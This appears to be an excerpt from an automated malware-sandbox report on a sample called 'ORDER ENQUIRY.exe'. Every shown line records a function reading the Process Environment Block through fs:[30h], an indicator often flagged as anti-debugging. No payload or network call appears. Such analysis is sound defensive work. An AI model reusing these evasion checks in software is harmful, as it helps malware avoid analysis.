          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD438F mov eax, dword ptr fs:[00000030h]3_2_01AD438F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA8397 mov eax, dword ptr fs:[00000030h]3_2_01AA8397
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC03E9 mov eax, dword ptr fs:[00000030h]3_2_01AC03E9
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE63FF mov eax, dword ptr fs:[00000030h]3_2_01AE63FF
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ACE3F0 mov eax, dword ptr fs:[00000030h]3_2_01ACE3F0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B543D4 mov eax, dword ptr fs:[00000030h]3_2_01B543D4
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B543D4 mov eax, dword ptr fs:[00000030h]3_2_01B543D4
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA3C0 mov eax, dword ptr fs:[00000030h]3_2_01ABA3C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]3_2_01AB83C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]3_2_01AB83C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]3_2_01AB83C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB83C0 mov eax, dword ptr fs:[00000030h]3_2_01AB83C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]3_2_01B5E3DB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]3_2_01B5E3DB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E3DB mov ecx, dword ptr fs:[00000030h]3_2_01B5E3DB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5E3DB mov eax, dword ptr fs:[00000030h]3_2_01B5E3DB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B363C0 mov eax, dword ptr fs:[00000030h]3_2_01B363C0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6C3CD mov eax, dword ptr fs:[00000030h]3_2_01B6C3CD
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]3_2_01B88324
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B88324 mov ecx, dword ptr fs:[00000030h]3_2_01B88324
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]3_2_01B88324
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B88324 mov eax, dword ptr fs:[00000030h]3_2_01B88324
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]3_2_01AEA30B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]3_2_01AEA30B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA30B mov eax, dword ptr fs:[00000030h]3_2_01AEA30B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAC310 mov ecx, dword ptr fs:[00000030h]3_2_01AAC310
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD0310 mov ecx, dword ptr fs:[00000030h]3_2_01AD0310
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B5437C mov eax, dword ptr fs:[00000030h]3_2_01B5437C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B7A352 mov eax, dword ptr fs:[00000030h]3_2_01B7A352
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B58350 mov ecx, dword ptr fs:[00000030h]3_2_01B58350
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3035C mov ecx, dword ptr fs:[00000030h]3_2_01B3035C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3035C mov eax, dword ptr fs:[00000030h]3_2_01B3035C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B8634F mov eax, dword ptr fs:[00000030h]3_2_01B8634F
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B32349 mov eax, dword ptr fs:[00000030h]3_2_01B32349
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC02A0 mov eax, dword ptr fs:[00000030h]3_2_01AC02A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC02A0 mov eax, dword ptr fs:[00000030h]3_2_01AC02A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B462A0 mov ecx, dword ptr fs:[00000030h]3_2_01B462A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B462A0 mov eax, dword ptr fs:[00000030h]3_2_01B462A0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE284 mov eax, dword ptr fs:[00000030h]3_2_01AEE284
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE284 mov eax, dword ptr fs:[00000030h]3_2_01AEE284
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]3_2_01B30283
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]3_2_01B30283
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B30283 mov eax, dword ptr fs:[00000030h]3_2_01B30283
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]3_2_01AC02E1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]3_2_01AC02E1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC02E1 mov eax, dword ptr fs:[00000030h]3_2_01AC02E1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ABA2C3 mov eax, dword ptr fs:[00000030h]3_2_01ABA2C3
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B862D6 mov eax, dword ptr fs:[00000030h]3_2_01B862D6
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA823B mov eax, dword ptr fs:[00000030h]3_2_01AA823B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA826B mov eax, dword ptr fs:[00000030h]3_2_01AA826B
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B60274 mov eax, dword ptr fs:[00000030h]3_2_01B60274
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]3_2_01AB4260
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]3_2_01AB4260
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB4260 mov eax, dword ptr fs:[00000030h]3_2_01AB4260
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B8625D mov eax, dword ptr fs:[00000030h]3_2_01B8625D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6A250 mov eax, dword ptr fs:[00000030h]3_2_01B6A250
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6A250 mov eax, dword ptr fs:[00000030h]3_2_01B6A250
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B38243 mov eax, dword ptr fs:[00000030h]3_2_01B38243
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B38243 mov ecx, dword ptr fs:[00000030h]3_2_01B38243
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB6259 mov eax, dword ptr fs:[00000030h]3_2_01AB6259
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAA250 mov eax, dword ptr fs:[00000030h]3_2_01AAA250
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]3_2_01B305A7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]3_2_01B305A7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B305A7 mov eax, dword ptr fs:[00000030h]3_2_01B305A7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD45B1 mov eax, dword ptr fs:[00000030h]3_2_01AD45B1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD45B1 mov eax, dword ptr fs:[00000030h]3_2_01AD45B1
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE4588 mov eax, dword ptr fs:[00000030h]3_2_01AE4588
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB2582 mov eax, dword ptr fs:[00000030h]3_2_01AB2582
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB2582 mov ecx, dword ptr fs:[00000030h]3_2_01AB2582
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE59C mov eax, dword ptr fs:[00000030h]3_2_01AEE59C
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEC5ED mov eax, dword ptr fs:[00000030h]3_2_01AEC5ED
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEC5ED mov eax, dword ptr fs:[00000030h]3_2_01AEC5ED
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE5E7 mov eax, dword ptr fs:[00000030h]3_2_01ADE5E7
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB25E0 mov eax, dword ptr fs:[00000030h]3_2_01AB25E0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE5CF mov eax, dword ptr fs:[00000030h]3_2_01AEE5CF
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE5CF mov eax, dword ptr fs:[00000030h]3_2_01AEE5CF
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB65D0 mov eax, dword ptr fs:[00000030h]3_2_01AB65D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA5D0 mov eax, dword ptr fs:[00000030h]3_2_01AEA5D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA5D0 mov eax, dword ptr fs:[00000030h]3_2_01AEA5D0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADE53E mov eax, dword ptr fs:[00000030h]3_2_01ADE53E
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AC0535 mov eax, dword ptr fs:[00000030h]3_2_01AC0535
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B46500 mov eax, dword ptr fs:[00000030h]3_2_01B46500
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B84500 mov eax, dword ptr fs:[00000030h]3_2_01B84500
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]3_2_01AE656A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]3_2_01AE656A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE656A mov eax, dword ptr fs:[00000030h]3_2_01AE656A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB8550 mov eax, dword ptr fs:[00000030h]3_2_01AB8550
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB8550 mov eax, dword ptr fs:[00000030h]3_2_01AB8550
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB64AB mov eax, dword ptr fs:[00000030h]3_2_01AB64AB
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3A4B0 mov eax, dword ptr fs:[00000030h]3_2_01B3A4B0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE44B0 mov ecx, dword ptr fs:[00000030h]3_2_01AE44B0
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6A49A mov eax, dword ptr fs:[00000030h]3_2_01B6A49A
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AB04E5 mov ecx, dword ptr fs:[00000030h]3_2_01AB04E5
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]3_2_01AAE420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]3_2_01AAE420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAE420 mov eax, dword ptr fs:[00000030h]3_2_01AAE420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AAC427 mov eax, dword ptr fs:[00000030h]3_2_01AAC427
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B36420 mov eax, dword ptr fs:[00000030h]3_2_01B36420
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEA430 mov eax, dword ptr fs:[00000030h]3_2_01AEA430
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]3_2_01AE8402
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]3_2_01AE8402
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AE8402 mov eax, dword ptr fs:[00000030h]3_2_01AE8402
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B3C460 mov ecx, dword ptr fs:[00000030h]3_2_01B3C460
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]3_2_01ADA470
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]3_2_01ADA470
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01ADA470 mov eax, dword ptr fs:[00000030h]3_2_01ADA470
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01B6A456 mov eax, dword ptr fs:[00000030h]3_2_01B6A456
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AEE443 mov eax, dword ptr fs:[00000030h]3_2_01AEE443
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AA645D mov eax, dword ptr fs:[00000030h]3_2_01AA645D
          Source: C:\Users\user\Desktop\ORDER ENQUIRY.exeCode function: 3_2_01AD245A mov eax, dword ptr fs:[00000030h]3_2_01AD245A
